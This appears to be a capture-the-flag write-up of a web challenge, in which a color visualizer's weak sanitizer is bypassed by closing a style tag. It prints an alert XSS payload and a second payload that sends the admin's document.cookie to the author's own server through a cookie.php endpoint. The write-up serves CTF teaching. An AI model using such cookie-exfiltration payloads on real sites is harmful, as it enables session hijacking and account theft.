![74ebcb8ed17db8be4ff34481a6a210aa.png](320fd670dd1845439d57d2d6a8ac9abd.png)
/admin
![03ba8f48dae28b13e3d6135b7e16db9d.png](a33833c3c1b34de4a2696506094f382f.png)
Let's check out the source of the color visualizer.
![b5c6b49a7587b503bdf6ddf89a0efbe0.png](4795d9d2f2a34345a816d4e2435b17a7.png)
In the source we can see how it's setting the background color, and that it's sanitizing the input to protect against XSS. Or is it?
I noticed in my tests that only the initial <> are being filtered out. Anything after that is fine.
So by escaping the style set variable, we can inject our XSS payload.
`<></style><img src=x onerror=alert(document.cookie)>`
![5b31e3f231e70dcda24e0ac37c4936cf.png](0d3009eb17ef47d6a38cb2b9a9c55a08.png)
So we have XSS, but we want to send the cookie back to us rather than alert it.
Here is the script that I hosted on my VPS:
![47190ff94ae10196255595d93e7a0ab0.png](9b450e01a3f94f19aa05ab12a241c451.png)
And here is the new payload:
`<></style><img src=x onerror=document.location='http://REDACTED/cookie.php?c='+document.cookie>;`
So now we can pass this information through the Admin page
URL to visit: [http://chall.csivit.com:30256/view](http://chall.csivit.com:30256/view)
Color to see: payload
![8ea6baf7cbb4aa83288691d4d269d0b5.png](dab45ef3a39d439fa0f95fa43cebc41c.png)
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #web #xss #css
Related: